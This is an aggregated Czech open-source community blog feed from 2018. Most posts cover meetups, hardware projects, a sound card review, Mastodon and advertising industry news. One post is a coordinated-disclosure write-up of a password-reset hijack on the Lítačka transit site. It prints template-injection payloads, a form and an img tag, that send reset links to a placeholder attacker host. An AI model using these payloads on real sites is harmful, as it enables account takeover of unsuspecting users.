Planeta.OpenAlt.org

Pozvánka na 156. sraz OpenAlt – Brno

září
21
Openalt.org

Sraz, pokec, pivko, v páte 20. žáří 2018 od 18 hodin v restauraci Na Purkyňce na ulici Purkyňova 80.

Pozvánka na 156. sraz OpenAlt – Praha

září
18
Openalt.org

Zářijový pražský sraz spolku OpenAlt se koná již tento čtvrtek – 20. 9. 2018 od 18:00 v Radegastovně Perón (Stroupežnického 20, Praha 5). Tentokrát bez oficiální přednášky, ale zato s dobrým jídlem a pivem – volná diskuse na téma IoT, CNC, svobodný software, hardware a další hračky.

PLL ADF4351 jako LO

Na eBay nebo Aliexpress je možné koupit velmi levné vývojové desky s PLL od Analog Devices ADF4351. Tento obvod funguje od 35 MHz do 4.4 GHz. Krok je 10 kHz. Deska má 2 výstupy. Maximální výstupní výkon je +5dBm. V základu je deska osazena oscilátorem 25 MHz. Je možné připojit extrerní oscilátor (na desce je třaba odpájet R5 a tím odpojit interní). Toto je vhodné třeba na připojení 10MHz normálu s GPS. Tímto modulem  můžeme velmi lehce realizovat LO pro MW transvertory nebo osobní maják pro testy zařízení. Případně signální generátor pro různá měření.  Navrhl jsem velmi jednoduchou destičku která se přímo nasadí na modul. Obsahuje MCU ATTiny13. Výsledný zdrojový kód je možné zkompilovat pomocí Arduino IDE za pomoci https://github.com/MCUdude/MicroCore a programátoru ISP. Do programu je nutné zadat hodnoty regisrů pro nastavení PLL.  Hodnoty registrů získáme z datasheetu a nebo jednodušeji z SW který je k dispozici na stánkách Analog Devices.


Nastavení registrů v SW.
Zdrojové ḱódy  je možné stáhnout z https://github.com/ok1cdj/ADF4351-basic-LO a stavebnici desky je možné zakoupit na hamshop.cz

Únos resetu hesel na Lítačce

září
14
Michal Spacek

Pár dní po spuštění jsme se na to s Jakubem Boučkem z rychlíku podívali a pár bezpečnostních chyb našli vcelku rychle. Kvůli jedné z nich jde zneužít nepovedený reset zapomenutých hesel k únosu účtů.

Nejdříve ale vlítneme na registraci, protože pro další zkoumání budeme potřebovat účet. Po zadání e-mailové adresy a hesla při registraci je ještě nutné účet aktivovat kliknutím na odkaz, který Lítačka pošle na zadaný e-mail.

Aktivace jakéhokoliv účtu

Obsah aktivačního e-mailu včetně odkazu se ale nejdřív posílá z prohlížeče na server, ten ho vezme a pošle na zadaný e-mail. Pokud chcete ověřit jakýkoliv účet, tak se stačí podívat co váš prohlížeč posílá a vytáhnout si ten správný odkaz.

Registrace začíná odesláním těchto dat z JavaScriptu na https://www.pidlitacka.cz/api:

{
   "params": {
      "UserName": "litacka@...",
      "Password": "...",
      "SendPUK": false
   },
   "action": "CreateLogin"
}
Web Developer nástroje ve Firefoxu

Takhle to vypadá v Developer Tools ve Firefoxu, jiný nástroj nebudeme potřebovat

Server prohlížeči vrátí:

{
   "Result": {
      "ID": 0,
      "Type": {
         "Text": null,
         "ID": 0
      },
      "Text": "OK"
   },
   "Login": {
      "UserName": "litacka@...",
      "LoginID": ...,
      "Active": false
   }
}

Následuje poslání obsahu e-mailu z prohlížeče na https://www.pidlitacka.cz/api, server ho vezme a pošle na zadanou adresu:

{
   "action": "SendEmail",
   "params": {
      "LoginID": ...,
      "TokenID": 1,
      "BodyIsHtml": true,
      "Body": "...HTML... aktivaci Vašeho účtu provedete na následujícím odkazu: <br> <a href=\"https://www.pidlitacka.cz/activation?user=...&id=...\"> ...HTML...",
      "Email": "litacka@...",
      "Subject": "Aktivace účtu"
   }
}

Z vašeho prohlížeče si tedy můžete vytáhnout odkaz https://www.pidlitacka.cz/activation?user=...&id=... pro ověření jakéhokoliv e-mailu. Stačí si otevřít Developer Tools a podívat se na odeslaný požadavek. Zajímavostí je také to, že parametr user v odkazu je do Base64 zakódovaná e-mailová adresa uživatele, jehož účet chcete aktivovat a parametr id je 19 číslic, z nichž prvních 10 nápadně připomíná „timestamp“, tedy počet vteřin od 1.1.1970, častý formát zápisu času.

Jakuba napadlo se podívat na zoubek i resetu hesel. Pokud by prohlížeč stejným způsobem posílal i odkaz na reset zapomenutého hesla, tak by se případný útočník mohl dostat i k tomu odkazu a mohl tak komukoliv unést účet resetováním hesla.

Reset zapomenutých hesel

Reset hesla začíná kontrolou existence uživatelského jména, na https://www.pidlitacka.cz/api se pošlou tato data:

{
   "action": "CheckUserName",
   "params": {
      "UserName": "litacka@..."
   }
}

Po odpovědi ze serveru, která obsahuje mj. "LoginID": ..., prohlížeč sestaví zprávu, která se má uživateli poslat a pošle ji na https://www.pidlitacka.cz/api/requestPasswordChange. Odesílaná data:

{
   "template": "...HTML... {{content}} ...HTML...",
   "root": "https://www.pidlitacka.cz/",
   "params": {
      "email": "litacka@..."
   },
   "type": "password"
}

V prohlížeči se po odeslání objeví „Byl vám odeslán email s odkazem pro změnu hesla“, ale požadavek na nastavení nového hesla obsahuje opravdu jenom {{content}}. Na toto místo server přidá odkaz a nějaký další text a výslednou zprávu pošle na zadaný e-mail. Takže asi smůla.

Dobrý den, na základě Vaší on-line žádosti o změnu hesla Vám zasíláme odkaz, na kterém tuto změnu můžete provést.

Výsledná zpráva s nahrazeným {{content}}

Ledaže bychom si nějak ze stránky vytáhli („exfiltrovali“) to HTML, které Lítačka doplní na místo značky {{content}} a poslali ho k sobě na server. Jo, to by šlo. HTML kolem {{content}} má útočník pod kontrolou, takže tu značku může něčím obalit, třeba formulářem a značkou textarea:

{
   "template": "...HTML... <form action=https://útočník><textarea name=html>{{content}}</textarea><input type=submit value=NASTAV></form> ...HTML...",
   "root": "https://www.pidlitacka.cz/",
   "params": {
      "email": "litacka@..."
   },
   "type": "password"
}

Uživateli přijde e-mail, ve kterém uvidí tlačítko NASTAV, klikne na něj a v tu chvíli prohlížeč vezme obsah útočníkem přidaného textového políčka, do kterého server předtím vložil zprávu včetně unikátního odkazu, a pošle ho na útočníkem zadanou adresu.

Zpráva s tlačítkem NASTAV HESLO

Upravená doručená zpráva, jistě by šla víc vyšperkovat

V logu serveru se pak dá najít něco jako:

GET /?html=...%3Ca+href%3D%22https%3A%2F%2Fwww.pidlitacka.cz%2Fpassword-reset%2Fstep2%3Fid%3D...%22%3E... HTTP/2.0

Po dekódování dostaneme <a href="https://www.pidlitacka.cz/password-reset/step2?id=...">. Stačí ten odkaz vzít, otevřít si ho v prohlížeči a nastavit jakémukoliv uživateli nové heslo a tím mu v podstatě unést účet.

Zapomněli jste heslo? Zde si ho můžete obnovit.

Jednotlivé kroky útoku vypadají následovně:

+-------------+
|  Prohlížeč  | (posílá útočníkem upravenou šablonu a adresu oběti)
+------+------+
       |
<form action=útočník>{{content}}</form>
       |
+------v------+
| Lítačka API | (nahradí {{content}} za odkaz, posílá e-mail)
+------+------+
       |
<form action=útočník>odkaz</form>
       |
+------v------+
|    Oběť     | (uživatel klikne na tlačítko v e-mailu)
+------+------+
       |
odkaz na reset hesla
       |
+------v------+
|   Útočník   | (může nastavit heslo oběti a unést účet)
+-------------+

Únos obrázkem

Uvedený způsob vyžaduje uživatelskou akci – uživatel musí kliknout na tlačítko v e-mailu. Další možností je pokusit se načíst obrázek z útočníkovo serveru:

<img src='https://útočník/?html={{content}}'>

Uživatel si otevře e-mail a jeho prohlížeč narazí na útočníkem vložený obrázek. V tu chvíli se browser pokusí stáhnout obrázek z adresy, do které server doplnil e-mail s unikátním kódem pro reset hesla. Všimněte si ohraničení hodnoty atributu src pomocí apostrofů (někdy jim říkáme jednoduché uvozovky). To je proto, že klasické (dvojité) uvozovky z HTML, které se dosadí místo značky {{content}}, by nám jinak src rozbily a předčasně ukončily.

Takový únos HTML ale nefunguje v Chrome, v něm jsou blokovány požadavky na obrázky s adresou, která obsahuje nové řádky a znak menší než (<). Ve Firefoxu by to prošlo, v logu by se objevilo něco jako:

GET /?html=...%3Ca%20href=%22https://www.pidlitacka.cz/password-reset/step2?id=...%22%3E... HTTP/2.0
Únos odkazu přes obrázek ve Firefoxu

Požadavek na obrázek s uneseným odkazem v Developer Tools ve Firefoxu

Jistě by to šlo celé zkombinovat a automatizovat, ale to není cílem tohoto článku. Jednotlivé kroky vypadají podobně jako v případě použití útočníkem přidaného formuláře, jen uživatel nemusí na nic klikat.

Společně s Jakubem Boučkem vás, webové vývojáře, prosíme, nevěřte ničemu co vám prohlížeč posílá, děkujeme. Rozhodně vám totiž nemusí vrátit to, co mu pošlete. A taky si na web dejte soubor security.txt, ať nemusíme dlouze hledat, komu takové chyby hlásit. Lítačka už takový soubor přidala.

Dodatek

Tak jako vždy jsem po napsání textu výše poslal odkaz dotčené firmě s tím, že ho za týden vydám (chybu jsme už před napsáním článku začali rozebírat veřejně na Facebooku, takže nebyl důvod ho „tajit“ déle). Jejich reakce byla ukázková:

  • 29. srpna 2018 ve 22:41 jsem poslal odkaz na neveřejný článek Michalovi Fišerovi, šéfovi společnosti Operátor ICT, a.s., která Lítačku vytvořila
  • 30. srpna v 0:30 posílám odkaz pro jistotu ještě vedoucímu oddělení vývoje a inovací (máme společného známého, díky Vašku za zprostředkování kontaktu), ten za 13 minut(!) odpovídá a píše „Postarám se, aby se dostal na ty správná místa“, wow!
  • 30. srpna v 7:55 reaguje i Michal Fišer, wow!
  • 30. srpna v 13:02 přichází e-mail od vedoucího oddělení ICT, později odpoledne mi volal, že ještě ten den nasadí opravu, ty jo!
  • 31. srpna ve 13:55 posílám popis chyb, na které mě upozornil Jakub. Jedná se o nesouvisející chybu při pokusu o registraci e-mailu, který obsahuje znak + a o dost vážnější problém, který i po pokusu o opravu stále umožní aktivovat účet někoho jiného: v požadavku z prohlížeče stačí zaměnit e-mailovou adresu oběti za nějakou jinou, na kterou server pošle aktivační odkaz pro uživatele podle loginId, které je také součástí požadavku. Pro správnou funkčnost odkazu je pak potřeba vrátit původní adresu oběti zpět do parametru user.
  • 1. září v 1:11 ještě doplňuji, že reset hesla už podle nás vypadá v pořádku, ale upozorňuji na zřejmou chybu původního API pro posílání aktivačních e-mailů, které jde zneužít pro poslání jakýchkoliv e-mailů na libovolné adresy.
  • Po víkendu, 3. září 2018, 23:08, dostávám odpověď, že nasazují opravy i těch zbylých chyb a že chyba při zadání adresy se znakem + je známá a že prý „bojují s problémem na straně použitého LDAP“. Chápu.
  • V úterý 4. září odpoledne si Operátor ICT telefonicky vyžádal posunutí vydání článku o týden – prý se ta poslední dávka oprav nepovedla podle představ. Původně měl článek vyjít následující den, ale Operátor ICT skvěle reaguje a snaží se, tu hlavní chybu (únos resetu hesel) už opravil, a tak to mile rád vydám později.
  • Po týdnu, 12. září, posílám dotaz, jestli jsou ready. Po pár hodinách dostávám odpověď, že skoro jo a že druhý den bude ještě omezeno zasílání libovolných emailů.
  • Dnes dostávám slíbené vyjádření a konečně mačkám tlačítko „Vydat článek“.

Vyjádření Operátora ICT

„Velice si ceníme profesionálního přístupu p. Špačka a jeho kolegy, kteří nás informovali o potencionální bezpečnostní hrozbě v systému, který je nyní v pilotní fázi. Jsme rádi, že jsme na základě jeho podnětu podnikli okamžité kroky ke zlepšení bezpečnosti regionálního dopravně odbavovacího systému. Právě zpětná vazba od expertů je pro nás velice přínosná a pomáhá nám neustále vylepšovat systém pro bezmála 3 miliony cestujících v rámci Prahy a Středočeského kraje. Díky rychlé a profesionální reakci tak nedošlo k žádnému případu zneužití.“ Vladimír Antonin Bláha, tiskový mluvčí městské společnosti Operátor ICT, a.s.

Díky Jakubovi (@JakubBoucek) za spolupráci a společnosti Operátor ICT za skvělé řešení tohoto incidentu. Kéž by takový přístup měli všichni.

Jak hacknout server přes RDP a jak tomu zabránit

Často slýchám nadávat adminy, jak je možné, že mají zašifrovaný server, i když používají antivirové programy a to i na

Příspěvek Jak hacknout server přes RDP a jak tomu zabránit pochází z Spajk.cz

Zvuková karta Roland Rubix44

Popis

Karta Roland Rubix44 disponuje čtyřmi analogovými vstupy i výstupy (proto 44, existují i varianty 2/2 a 2/4), všechny 192kHz / 24b s vysoce kvalitními DAC a ADC od Ti nebo Burr-Brown (takže stále Texas Instruments). Pojďme si ji ve stručnosti popsat.

Pokud se chcete pokochat tím, co karta skrývá uvnitř, můžete se podívat na skvělý popis s fotografiemi od Franty.

Karta má 4 analogové vstupy v provedení XLR od Neutrik, tedy XLR + 6.35mm jack. Všechny vstupy jsou balancované (je možné zapojit i nebalancovaný vstup).

Každý vstup má samostatné nastavení citlivosti i indikaci přebuzení. Přebuzení je indikováno červenou led na předním a horním šasi přístroje. Správná úroveň signálu je potom indikována zelenou barvou.

Pozn.: Při zapnutí karta postupně problikne všechny kontrolky, takže je možné pořídit snímek zeleně rozsvícených kontrolek úrovně signálu i bez zapojení vstupů.

Pro dvojice vstupů je možné zapnout kompresor nebo limiter. Na výběr jsou dva druhy kompresorů a limiter, pro každou dvojici vstupů je možné mít jiné nastavení. Výběru typu kompresoru je možný na zadní straně přístroje. Na přední straně můžeme kompresor zapnout a nastavit jeho práh. Přebuzení kompresoru je opět indikováno rozsvícením červené led.

Pro dvojice vstupů je možné zapnout fantómové napájení 48V pro kondenzátorové mikrofony. Stejně tak je možné pro dvojici vstupů zapnout vysokou impedanci pro určité typy snímačů.

Všechny zapnuté funkce jsou indikovány oranžovou led kolem příslušných tlačítek.

Výstupy jsou realizovány čtveřicí 6.35mm jack, opět všechny balancované.

Dále je zde výstup na sluchátka, opět standardní 6.35mm jack. Hlasitost sluchátek lze ovládat zcela nezávisle na nastavení hlasitosti výstupu. Na zadní straně přístroje můžeme nastavit, které ze dvou výstupů mají jít do sluchátek.

Výstup do sluchátek nepatří k nejhlasitějším. Mám rád, pokud je zařízení schopno hrát až na práh bolestivosti a mít tak velký prostor mezi poslechovou hlasitostí a maximem. Tady je maximum docela nízko a je nutno použít citlivější sluchátka. Beyerdynamic DT 990 Pro už jsou docela na hraně, Beyerdynamic T70 jsou citlivější a tady je vše v pořádku. Obě jsem testoval v 250Ω variantě. 32Ω sluchátka hrají pochopitelně daleko hlasitěji, ale to se zase nebavíme o HiFi.

Karta tedy poskytuje obrovské množství nastavení a to pro jednotlivé vstupy zvlášť a potom pro dvojice vstupů. Ke dvojici stupů se potom chová (přirozeně), jako ke stereo vstupu nebo výstupu.

Zprovoznění v Linuxu

Zapojte do USB. Rubix funguje out of box a není potřeba nic řešit. Dokonce ani není nic k nastavení, alsamixer je prázdný. Karta nemá žádnou digitálně řízenou regulaci hlasitosti, vše se nastavuje na zvukovce pomocí potenciometrů.

Zprovoznění ve Windows 10

Nepovedlo se mi to. Ačkoliv se jedná o USB Audio Class a nic standardnějšího snad ani neexistuje, tak ve Windows je nutné mít speciální ovladač a to pro každý major update W10 jiný. Nejnovější ovladače z webu Roland v době psaní tohoto článku nefungovaly v poslední verzi Windows 10. Ale Windows neřeším, kartu jsem koupil pro provoz v Linuxu a tady je vše bez problémů.

Nastavení Pulse Audio

Karta funguje bez problémů v PulseAudio, pokud ale chceme vytáhnout maximum (192kHz/24b) je nutné k ní přistupovat přímo jako k Alsa device. To lze snadno udělat tak, že v Pulse Audio Control nastavíme profil off a v konkrétní aplikaci zvolíme Alsa device Rubix44.

Nechci vyvolávat další flame na téma Pulse Audio. Nikdy se mi nepovedlo zprovoznit PA ani na 96kHz pro DragonFly. PA je nejlépe nechat v defaultu na systémové zvuky a vybrané zvukovky používat přímo pomocí Alsa.

V tomto případě mám PA nastaveno na interní zvukovou kartu a ostatní karty jsou v PA vypnuté. To nám umožní používat vybrané karty přímo v konkrétních programech. Např v Audacity:

A hudební přehrávač (více o nastavení DragonFlyDAC v samostatném článku):

Kvalita

Co mě překvapilo a překvapuje mě to pokaždé, když se setkám s highend zvukovým zařízením, je ticho. Ano, ticho. Šum sluchátkového výstupu je tak nízko, že ani na nejvyšší zesílení (bez signálu) neslyším ani nejmenší náznak šumu. Jinak je kvalita dle očekávání zcela excelentní. Přiznám se, že se pokaždé bojím, pokud je něco napájeno ze spínaného zdroje (v tomto případě 9V externího zdroje) nebo z USB, že z napájení bude pronikat rušení do audio signálu. Nic takového. Ani u DragonFly neslyšíte různé zatížení zdroje PC (přenášené přes USB napájení do DACu), ani tady se o šum z napájení netřeba bát.

Nedostatky

Zvukovka má funkci direct monitor, tedy si můžete do výstupů pustit rovnou vstupy. Bylo by ovšem hezké, kdyby byl k disposici přepínač, který by umožnil direct monitor přesměrovat pouze do sluchátkového výstupu a nikoliv do výstupu hlavního. Případně funkci monitor solo, tedy že by do sluchátkového výstupu šel jen konkrétní vstup.

Ano vím, že toto jsou funkce dostupné na mixážním pultu a zvuková karta má zcela jinou roli, ale když už tam je fce direct monitoringu, tak proč tam nedat přepínač jen pro sluchátka.

EDIT: Upřesnění předchozího odstavce. Direct monitor jde vždy na výstup 12 bez ohledu na to, která ze dvojice vstupů (12 nebo 34) se monitoruje. Je tedy možné mít hlavní výstup z karty (třeba do reproduktorů) zapojený na výstup 34, sluchátka mít přepnutá na výstup 12 a pomocí sluchátek monitorovat úrovně vstupů. Tímto vysvětlením tedy předchozí nedostatek odpadá.

Další věcí, která mi chybí, je přepínač direct output. Výstupní hlasitost se ovládá potenciometrem na předním panelu, ocenil bych tlačítko pro linkový výstup a přemostění tohoto potenciometru.

Ale to jsou skutečně jen drobnosti. Potenciometr ovládání výstupů mám na maximum a hlasitost ovládám až na hifi zesilovači.

Klady

Kromě kvality zvuku a bezproblémového zprovoznění v Linuxu bych chtěl především vypíchnout ovládání na samotném přístroji. Všechny často používané funkce jsou dostupné z předního panelu a všechny zapnuté funkce jsou indikované oranžovým světlem kolem příslušných tlačítek. Je vždy na první pohled vidět, co je zapnuté a v jakém je zvukovka nastavení. Indikace síly signálu a přebuzení vstupů nebo kompresorů je potom zcela nepřehlédnutelná.

Závěr

Kartu jsem kupoval zejména kvůli vstupům pro mikrofony a vybral jsem si ji právě pro širokou nabídku nastavení jednotlivých vstupů. Nechci pokaždé vytahovat mixák jen k vůli kompresoru, hledal jsem kompaktnější řešení, které se vejde na stůl a nepřekáží. To se povedlo. Mám k disposici 4 dostatečně nezávislé vstupy, skvělý a čistý sluchátkový výstup a bezproblémový nahrávací audio interface v linuxu s vynikající kvalitou a  vysokým samplerate.

Akční kamera Eken H9R

září
10
Josef Jebavý
Pořídil jsem si akční kameru Eken H9R, která má bez problémů fungovat v Linuxu i jako webkamera, zapojil jsem ji, abych zjistil jak na tom kamera je.....

Profilování SQL dotazů pomocí Netbeans

září
08
Franta Kučera

zdroj perexu

Proč používat filesystém JFS

září
07
Josef Jebavý
Když se mě kolega Martin zeptal: Na blogu pises, ze pouzivas JFS. Mohl bys zhrnout, proc ho pouzivas a jake ma vyhody? JFS nikde nemam, takze me to zajima. Protože......

Nový malý úsporný úžasný DC-DC step-down měnič

září
06
Petr Stehlík
Našel jsem nový snižovač stejnosměrného napětí na AliExpressu a natočil jsem o něm (a vůbec o všech snižovačích napětí) video:


Modul zblízka vypadá takto:
K dostání třeba tady: DC DC Step Down Buck Converter Adjustable 4.5V-24V to 5V 3A 97.5% Power Supply Mini Module 1.8V 2.5V 3.3V 5V 9V 12v For Car

Koupit se dá i v Česku: Mikro nastavitelný zdroj snižující napětí 0,8-17V vysoká účinnost

Už kdysi jsem tu psal o měničích - v roce 2013 Přenosné napájení pro Arduino (DC step-down) a v roce 2014 Velký test DC step-down konvertorů, tak toto video je vlastně takové malé pokračování.

EDIT hned další den ráno:

Doplňuji užitečné informace z komentářů pod mým Google+ příspěvkem. Za prvé, na modulu je nejspíš použit starší čip (či jeho mladá čínská kopie) TPS54332 od Texas Instruments (jeho obdobou by měl být MP2315 od Monolithic Power).

Dále, převládající názor v komentářích je, že se nejedná o chybu chirurga při navrhování plošného spoje, ale že to byl krutý záměr, a že měděnou cestičku je potřeba přeříznout, pokud člověk nechce používat trimr. Pokusil jsem se o to skalpelem, a vyfotil modul před a po operaci:



Jak se praví ve známé písni "už to funguje, konev šetří vodou", takže kdo máte skalpel a chuť něco nebo někoho přeříznout, směle do toho :-)


vpsAdminOS: instalace, aktualizace, nasazení a síťování

září
03
vpsFree.cz

Během prázdnin jsme pracovali na spoustě zajímavých věcí, které bychom vám chtěli ukázat.

I když je vpsAdminOS primárně live systém, občas se hodí možnost nainstalovat systém na disk, např. když ho chcete provozovat na jednom serveru a nemáte PXE. Instalace probíhá stejně jako byste instalovali NixOS: naformátujete disky, vygenerujete config, upravíte ho a spustíte instalační program, viz dokumentace. Jako zavaděč je podporován grub a snadno lze integrovat i SSH v initrd pro odemykání šifrovaných disků, stejně jako v NixOS.

Pro aktualizování běžícího nebo nainstalovaného systému jsme připravili dva nástroje: os-rebuild (ala nixos-rebuild) a nixops (fork, který přidává podporu pro vpsAdminOS). os-rebuild se dá použít přímo z nainstalovaného systému, ale dá se tím aktualizovat i jiný stroj přes SSH. nixops pak řeší správu větší sítě serverů, asi něco jako terraform+ansible v jednom pro NixOS. S naší verzí nixops je možné spravovat v jedné síti NixOS i vpsAdminOS stroje.

Pro migraci dat při aktualizaci OS jsme vytvořili nástroj zvaný osup. vpsAdminOS se při aktualizaci „přeplácne“ novou verzí a níc víc se řešit nemusí, nicméně o konfiguraci a data kontejnerů na ZFS poolech je nutné se starat. Ne vše se podaří dobře navrhnout hned na začátku a změny mohou vyžadovat reorganizaci datasetů, adresářů, atd. Nástroj osup umožňuje takové změny provádět automatizovaně, spouští se spolu s aktualizací systému, ať už přes os-rebuild nebo nixops. Změny provádějí migrační skripty, kterými se pool buď aktualizuje na vyšší verzi, nebo se vrátí na verzi starší.

Už jsem se tu zmiňoval o nutnosti předělat správu IP adres ve vpsAdminu, OS už teď k tomu umí vše potřebné. K síťovým rozhraním VPS se nyní dají zvlášť přidělovat routované adresy a adresy přiřazené na rozhraní, ala ip addr/route add. Takže je např. možné routovat síť /64 a na rozhraní přidělit jen vybrané adresy z dané sítě. Spojovací adresy nadále nebudou muset být na prvním místě, což komplikovalo nastavení sítě v dockeru a obecně maškarádu. Integrace do vpsAdminu je rozdělaná, ale je to poměrně složité a ještě to bude chvíli trvat.

IAB Europe vydala White Paper k header bidding a dynamice aukcí v programaticky obchodované reklamě

IAB Europe vydala White Paper k header bidding a dynamice aukcí v programaticky obchodované reklamě tereza.tumova@… Pá, 08/31/2018 - 11:19

Způsob, jakým se programaticky obchoduje reklama se rychle vyvíjí a nabízí různé mechanismy jako otevřenou aukci, garantovanou aukci a private deal. Jednou z klíčových změn v programatickém obchodování je header bidding, který ovlivnil způsob, jakým se reklamní prostor nakupuje a prodává a tím i dynamiku aukcí.
 
White paper IAB Europe popisuje základy toho, co header bidding je a jak funguje, jeho vývoj, výzvy a příležitosti pro zúčastněné strany na straně nákupu a prodeje. Poskytuje také podklady pro posouzení hlavních aspektů a dopadů při implementování strategie header bidding pro strany nákupu a prodeje.
 
White paper je ke stažení zde.

Objevuju Mastodon

Začátkem roku jsem psal, že jsem se stáhl z Facebooku, Google+ je dneska město duchů, tak se pohybuji především na Twitteru. Posledních pár týdnů ale objevuji jeho otevřenou a decentralizovanou alternativu – Mastodon. Jaký je?

223px-mastodon_logotype_28simple29-svg

Sociální sítě jsou fenoménem poslední dekády Internetu. Používají je miliardy lidí, vyrostly na nich globální korporace. Není divu, že vybízely k vytváření otevřených a nezávislých alternativ. Zatím ale bez většího úspěchu.

Takovou první otevřenou alternativou byla identi.ca a nedá se říct, že by byla úplně neúspěšná. Přišla krátce po Twitteru, rychle naakumulovala uživatelskou základnu v řádu milionů a minimálně v open-source komunitě byla relativně populární. Časem se úplně vytratila. Přešla ze StatusNet na Pump.io a dneska člověk na první pohled ani netuší, jestli to je fungující služba nebo WIP.

Velké haló svého času způsobila Diaspora jako alternativa k Facebooku. Před lety jsem si tam vytvořil účet, ale téměř nikoho tam nenašel. Když jsem se ze zajímavosti připojil nedávno, nebyl tam vůbec nikdo. Růst její uživatelské základy se zastavil ve stovkách tisích uživatelů, což je z globálního pohledu nic.

Standard StatusNet si po konci identi.ca žil dál svým životem a dal vzniknout GNU Social, což je decentralizovaná sociální síť taktéž bez větší uživatelské základny. Až v roce 2016 se objevil Mastodon, který si dal za cíl vytvořit vlastní síť instancí (komunit), ale skrze OStatus (nynější StatusNet) a ActivityPub být kompatibilní i s ostatními sítěmi (GNU Social, Pump.io…).

Vzhledem k tomu, že Mastodon je decentralizovaná síť, musíte si najít instanci, kde si budete chtít vytvořit účet. Já jsem si ten svůj vytvořil už před rokem, když jsem Mastodon jenom zběžně vyzkoušel. Vybral jsem si k tomu mastodon.cloud, který mi byl tenkrát doporučený a u kterého jsem zůstal i po návratu, protože pořád patří mezi instance s nejvíce uživateli. Nicméně dnes je zdaleka nejpopulárnější mastodon.social, který je provozovaný přímo tvůrci Mastodonu.

Instance jsou spíše o komunitách. Každá si může stanovit vlastní pravidla toho, co můžou uživatelé zveřejňovat. Jejich uživatelé se tak nemusí spoléhat na globálně nastavená pravidla a jejich vynucování, jako je tomu u Facebooku nebo Twitteru, ale prostě si vybrat komunitu, která jim vyhovuje nejvíc (od regulovaných až po ty, kde je možné zveřejňovat cokoliv). Samozřejmě vždy je možné sledovat a komunikovat s lidmi z ostatních instancí. Existuje i webová služba, která vám pomůže vybrat tu nejlepší instanci pro vás. Existuje i hosting, kde můžete mít vlastní instanci jako službu.

A jaký Mastodon je? Byl jsem docela překvapený, že to není takové město duchů jako otevřené sociální sítě před ním. Má násobně víc uživatelů než Diaspora a řekl bych, že vyrovnal úspěšnost Identi.ca (svého času). Samozřejmě proti Twitteru je to pořád niché. Uživatelská základna se skládá především z lidí, kteří hledají nezávislou alternativu k Twitteru nebo se zajímají o otevřené technologie. V této oblasti je Mastodon zajímavá síť.

Na Twitteru jsem za tři roky aktivního používání naakumuloval přes 600 sledujících, na Mastodonu jich mám za pár týdnů 20. Nicméně zatím mi přijdou v průměru výrazně aktivnější než sledující na Twitteru. Navíc jsou tam i zajímavé účty na sledování (KDE, GNOME, Baby Wogue, Nextcloud, řada open-source vývojářů). Popravdě ale nevím, kolik z toho je unikátní obsah. Nakonec i já funguju v režimu, že vše, co dávám na Mastodon, dám i na Twitter.

Co se týče používání z pohledu uživatele, tak ten, kdo zná Twitter, se zorientuje i na Mastodonu. Uživatelská jména jsou doplněná o server, kde jsou registrovaná, takže já mám @sesivany@mastodon.cloud. Timeline je přehlednější v tom, že nabízí chronologicky jenom to, co chcete sledovat. Nesnaží se vám inteligentně měnit pořadí nebo nabízet další tweety jako Twitter. UX webového rozhraní ani aplikací (používám Mastalab) není na úrovni Twitteru, není to takový rozdíl, aby si člověk řekl, že je nepřívětivé nebo se něco dělá komplikovaně. Navíc se vytváří nativní desktopový klient pro Linux, takže potom, co Twitter zařízl staré API a díky tomu i aplikace jako Corebird, bude Mastodon možná jedinou sociální sítí s nativním klientem pro Linux.

mastodon_desktop_web_screenshotWebové rozhraní Mastodonu

Trošku nešťastné mi přijde názvosloví. Už název Mastodon je takový všelijaký. Ale „toot“ místo „tweet“ mi přijde vyloženě zvláštní 🙂 Kdo nemá rád srdíčka na Twitteru, ocení, že Mastodon má pořád „favourite“.

Od Mastodonu jsem očekával město duchů a zatím jsem pozitivně překvapený. Twitter i nadále zůstává mojí primární sociální sítí, ale Mastodon beru jako zajímavý doplněk, zvlášť, když pomalu umírá Google+. Jsem zvědavý, jak se bude vyvíjet. Jestli si najde místo jako nezávislá alternativa k Twitteru nebo Facebooku, nebo skončí jako pokusy před ním.

Opravujeme chyby v softwaru: inotify-tools

V pátek jsem narazil na chybu v programu inotifywait a dneska jsem ji ze zvědavosti trochu prozkoumal. Program za určitých okolností padal (SIGSEGV, core dump). Jedná se o celkem banální chybu, kterých je všude plno, a rád bych na ní ukázal, jak v takovém případě můžeme postupovat.

string = csv

The Things Network – LoRaWAN – IoT

Většina lidí resp. jejich pracovních stanic, mobilů, dalších osobních zařízení a větších počítačů už je připojena k internetu. Současným trendem (už pár let) je připojování „věcí“ k internetu tzv. IoT. Věcmi jsou buď různá čidla, která posílají naměřené hodnoty do sítě, nebo akční členy, které na základě přijatých zpráv něco dělají, případně kombinovaná zařízení, která přijímají i odesílají zprávy zároveň.

The Things Network - IoT brána

Časem bude možná nějakou formou konektivity vybavené každé zařízení. Může se vám to nelíbit, můžete s tím nesouhlasit, ale… znáte to. Úspěšnou strategií je zajistit, aby použité technologie byly otevřené nikoli proprietární, aby síť patřila nám, abychom to byli my, kdo má vliv na její fungování, abychom dostupnou konektivitu používali tam, kde to má smysl, a v ostatních případech ji mohli vypnout nebo odstranit. V současné době se rozšiřuje IoT síť, která stojí na otevřených principech a na které se může podílet každý z nás.

Videa o tom, jak Evropané vnímají návrh nařízení ePR

Videa o tom, jak Evropané vnímají návrh nařízení ePR tereza.tumova@… St, 08/22/2018 - 07:22

IAB Europe zveřejnila v září 2017 podrobný výzkum provedený agenturami IHS Markit a GfK, který zkoumal význam dat pro digitální reklamu a hospodářství EU a zkušenosti Evropanů s internetem. Výzkum ukázal, že digitální reklama každoročně přispívá k hospodářství EU 526 miliardami eur a také, že většina Evropanů by využívala internet mnohem méně, pokud by webové stránky zavedly placený přístup.

Protože čísla nedokáží věrně vyprávět celý příběh, IAB Europe připravila videa na základě rozhovorů s profesionály z oboru digitální reklamy i samotnými uživateli internetu, na které by měl dopadnout návrh nařízení Evropské komise o soukromí a elektronických komunikacích (ePrivacy). Návrh předpokládá mj. to, že už nebude možné zpracovávat údaje o chování uživatele na internetu pro účely cílení online reklamy bez uživatelova aktivního souhlasu (tzv. opt-in).

Filmaři se ptali Evropanů, co si myslí o pravděpodobném dopadu nařízení na ekonomiku EU, na uživatelský zážitek na internetu i na jejich životy.

Tým procestoval východní, střední a západní Evropu, aby z úst těch, na něž má nařízení dopadnout slyšel, jak digitální reklamní průmysl skutečně využívá data, k jaké změně by podle navrhovaného nařízení došlo a jaký typ zážitku na internetu si přejí sami Evropané.

Ve videích se mj. dovíte:

